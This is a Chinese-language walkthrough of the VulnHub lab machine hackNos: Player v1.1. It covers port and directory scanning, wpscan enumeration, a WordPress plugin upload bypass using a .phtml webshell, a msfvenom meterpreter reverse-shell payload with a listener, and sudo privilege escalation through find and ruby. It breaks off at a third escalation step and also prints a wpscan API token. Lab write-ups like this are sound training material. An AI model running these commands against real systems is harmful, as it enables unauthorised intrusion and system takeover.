介绍信息收集
主机发现主机信息探测 网站探测
目录扫描wpscan列出站点的用户名、账号wpscan漏扫网站 Getshell提权
sudo提权获取所有Flag
介绍系列: hackNos(此系列共7台)
发布日期:2020年04月10日
难度:初级-中级
Flag : 1个,根用户的root.txt
学习:
wordpress 安全测试远程代码执行特权提升
靶机地址:https://www.vulnhub.com/entry/hacknos-player-v11,459/
信息收集 主机发现arp-scan主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
- 开放端口探测:nmap -p- 192.168.1.117,只开放了80和3306端口(快速确认开放端口)
- 对开放端口服务做进一步探测:nmap -p80,3306 -sV 192.168.1.117
- 使用默认的NSE脚本进行扫描:nmap -p3306 -sC 192.168.1.117
看到数据库版本是5.5.5
访问80端口,没什么有价值的信息。
gobuster dir -u http://192.168.1.117/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100
没发现什么有价值的信息,换用之前的文章 HACLABS: NO_NAME 中的套路(换用大字典)的方式依然无效。木得办法,回过头来看看网站首页吧,能不能看到什么有价值的东西。发现了一个网站目录:“g@web”
由于需要加载google站点的api,打开速度略慢。耐心等待一会后看到了如下网站。通过插件得知网站是WordPress 5.3.11
wpscan --url http://192.168.1.117/g@web -e u --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
发现了一条信息
打开网站,这个应该是个密码:hackNos@9012!!
尝试登录网站,失败
wpscan --url http://192.168.1.117/g@web/ -e vp --api-token se5dzb2kuZqWOYN3gK91L5asNOu1jNA0mdzDgSgndc8
发现远程代码执行漏洞!
打开根据提供的网址,看到了利用代码
复制下来,对url地址略作修改,得到:
After doing this, an uploaded file can be accessed at, say: http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml将其保存为本地的一个html文件,然后用浏览器打开它,如下图,是一个文件上传
这就好说了,一句话木马来了
Getshell由于webshell管理工具的字体大小、背景颜色不便于截图展示,所以我这里还是用msf来做吧。
- msf准备
生成后门 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.118 LPORT=4444 x> shell.php 开启监听 use exploit/multi/handler set payload php/meterpreter/reverse_tcp set LHOST 192.168.1.118 exploit
- 投递后门,失败了
看到提示,文件格式不支持!自己真是大意了,回过头在漏洞验证网站中得知,漏洞的成因为使用了switch case简单匹配了黑名单后缀导致可进行绕过,漏洞验证网站建议我们使用.phtml后缀绕过
- 修改后门后缀为.phtml,重新投递文件
- 访问后门
根据利用代码得知,上传的文件在:http://example.com/wp-content/uploads/wpsp
- 获取shell
鼠标单击文件,获取shell
前面使用wpscan拿到了密码:**hackNos@9012!! **,依次尝试,得知是 **security **用户的
发现一个敏感文件,暂时没有访问权限
- 第一次sudo提权
提示可以通过用户hacknos进行find提权,而靶机上只有hackNos-boat、hunter、security三个用户,因此这里的用户hacknos指的应该是hackNos-boat
如下图,切换用户hacknos失败,切换hackNos-boat成功
通过网站 https://gtfobins.github.io/gtfobins/find/ 获知提权命令:
sudo -u hackNos-boat find . -exec /bin/bash ; -quit
- 第二次sudo提权
继续尝试sudo提权,发现ruby提权,通过网站 https://gtfobins.github.io/gtfobins/ruby/ 得知提权命令:
sudo -u hunter ruby -e 'exec "/bin/sh"'
- 第三次sudo提权
